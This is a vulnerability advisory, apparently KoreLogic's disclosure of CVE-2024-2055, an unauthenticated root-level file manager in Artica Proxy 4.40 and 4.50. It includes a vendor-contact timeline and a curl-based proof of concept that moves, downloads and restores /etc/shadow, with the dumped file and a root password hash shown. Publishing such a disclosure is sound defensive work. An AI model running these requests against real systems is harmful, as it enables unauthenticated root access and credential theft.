Lucene search

Jim Becher of KoreLogic,KL-001-2024-003

HistoryMar 05, 2024 - 12:00 a.m.

Artica Proxy Unauthenticated File Manager Vulnerability

2024-03-0500:00:00

Jim Becher of KoreLogic,

korelogic.com

artica proxy

file manager

unauthenticated access

rich filemanager

remote attackers

root-level accounts

debian 10 lts

vulnerability disclosure

7.5 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

JSON

Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.40 and 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-288: Authentication Bypass Using an
Alternate Path or Channel, CWE-552: Files
or Directories Accessible to External
Parties
CVE ID: CVE-2024-2055
Vulnerability Description

The “Rich Filemanager” feature of Artica Proxy provides a
web-based interface for file management capabilities. When
the feature is enabled, it does not require authentication by
default, and runs as the root user.
Technical Description

The Artica Proxy can be installed with a small amount of
“Features” enabled. Within the administrative web interface,
additional features can be installed, enabled, and disabled. The
“Rich Filemanager” feature is disabled by default. Enabling
this feature will spawn a listener on port 5000/tcp bound to
0.0.0.0. By default, when this feature is enabled, authentication
is not required to access the web interface. The “Rich
Filemanager” runs as the root user. This provides an
unauthenticated attacker complete access to the file system.
```
root@artica:~# ps -efww | grep -i File
root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER
root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER
```
This can be exploited by an attacker to add entries in to
/etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create
an additional root-level account that has the ability to SSH
in to the system.
Mitigation and Remediation Recommendation

No response from vendor. Rich Filemanager feature is disabled
by default. Leave it that way.
Credit

This vulnerability was discovered by Jim Becher of KoreLogic,
Inc.
Disclosure Timeline

2023.12.18 - KoreLogic requests vulnerability contact and
secure communication method from Artica.
2023.12.18 - Artica Support issues automated ticket #1703011342
promising follow-up from a human.
2024.01.10 - KoreLogic again requests vulnerability contact and
secure communication method from Artica.
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
mail.articatech.com with response
“Client host rejected: Go Away!”
2024.01.11 - KoreLogic requests vulnerability contact and
secure communication method via
https://www.articatech.com/ ‘Contact Us’ web form.
2024.01.23 - KoreLogic requests CVE from MITRE.
2024.01.23 - MITRE issues automated ticket #1591692 promising
follow-up from a human.
2024.02.01 - 30 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.06 - KoreLogic requests update on CVE from MITRE.
2024.02.15 - KoreLogic requests update on CVE from MITRE.
2024.02.22 - KoreLogic reaches out to alternate CNA for
CVE identifiers.
2024.02.26 - 45 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.29 - Vulnerability details presented to AHA!
(takeonme.org) by proxy.
2024.03.01 - AHA! issues CVE-2024-2055 to track this
vulnerability.
2024.03.05 - KoreLogic public disclosure.
Proof of Concept

Step 1: Move /etc/shadow to /tmp/shadow
$ curl -s -k -X $‘GET’ -H $‘Host: 192.168.2.139:5000’ -H $‘Accept: application/json, text/javascript, /; q=0.01’ -H $‘Accept-Language: en-US,en;q=0.5’ -H $‘Accept-Encoding: gzip, deflate’ -H $‘X-Requested-With: XMLHttpRequest’ -H $‘Connection: close’ $‘http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198’

{“data”:{“id”:“/tmp/shadow”,“type”:“file”,“attributes”:{“name”:“shadow”,“path”:“/tmp/shadow”,“readable”:1,“writable”:1,“created”:“”,“modified”:“24 Nov 2023 15:55”,“timestamp”:1700862914,“height”:0,“width”:0,“size”:“2037”}}}

Step 2: Download /tmp/shadow
$ curl -s -k -X $‘GET’ -H $‘Host: 192.168.2.139:5000’ -H $‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8’ -H $‘Accept-Language: en-US,en;q=0.5’ -H $‘Accept-Encoding: gzip, deflate’ -H $‘Connection: close’ -H $‘Upgrade-Insecure-Requests: 1’ -H $‘Pragma: no-cache’ -H $‘Cache-Control: no-cache’ $‘http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870’

root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
daemon::19507:0:99999:7:::
bin::19507:0:99999:7:::
sys::19507:0:99999:7:::
sync::19507:0:99999:7:::
games::19507:0:99999:7:::
man::19507:0:99999:7:::
lp::19507:0:99999:7:::
mail::19507:0:99999:7:::
news::19507:0:99999:7:::
uucp::19507:0:99999:7:::
proxy::19507:0:99999:7:::
www-data::19507:0:99999:7:::
backup::19507:0:99999:7:::
list::19507:0:99999:7:::
irc::19507:0:99999:7:::
gnats::19507:0:99999:7:::
nobody::19507:0:99999:7:::
_apt::19507:0:99999:7:::
systemd-timesync::19507:0:99999:7:::
systemd-network::19507:0:99999:7:::
systemd-resolve::19507:0:99999:7:::
messagebus::19507:0:99999:7:::
quagga::19507:0:99999:7:::
apt-mirror::19507:0:99999:7:::
privoxy::19507:0:99999:7:::
ntp::19507:0:99999:7:::
redsocks:!:19507:0:99999:7:::
prads::19507:0:99999:7:::
freerad::19507:0:99999:7:::
vnstat::19507:0:99999:7:::
stunnel4:!:19507:0:99999:7:::
sshd::19507:0:99999:7:::
vde2-net::19507:0:99999:7:::
memcache:!:19507:0:99999:7:::
davfs2::19507:0:99999:7:::
ziproxy:!:19507:0:99999:7:::
proftpd:!:19507:0:99999:7:::
ftp::19507:0:99999:7:::
mosquitto::19507:0:99999:7:::
openldap:!:19507:0:99999:7:::
munin::19507:0:99999:7:::
msmtp::19507:0:99999:7:::
Debian-snmp:!:19507:0:99999:7:::
opendkim::19507:0:99999:7:::
avahi::19507:0:99999:7:::
glances:*:19507:0:99999:7:::
ArticaStats:!:19507:0:99999:7:::
netdata:!:19507:0:99999:7:::
mysql:!:19507:0:99999:7:::
postfix:!:19507:0:99999:7:::
squid:!:19507:0:99999:7:::
smokeping:!:19507:0:99999:7:::
unbound:!:19645:0:99999:7:::

Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition
$ curl -s -k -X $‘GET’ -H $‘Host: 192.168.2.139:5000’ -H $‘Accept: application/json, text/javascript, /; q=0.01’ -H $‘Accept-Language: en-US,en;q=0.5’ -H $‘Accept-Encoding: gzip, deflate’ -H $‘X-Requested-With: XMLHttpRequest’ -H $‘Connection: close’ $‘http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208’

{“data”:{“id”:“/etc/shadow”,“type”:“file”,“attributes”:{“name”:“shadow”,“path”:“/etc/shadow”,“readable”:0,“writable”:1,“created”:“”,“modified”:“24 Nov 2023 15:55”,“timestamp”:1700862914,“height”:0,“width”:0,“size”:0}}}

Affected configurations

Vulners

Node

articaintegria_imsMatch4.40

CPENameOperatorVersion
artica artica proxyeq4.40

CPE	Name	Operator	Version
	artica artica proxy	eq	4.40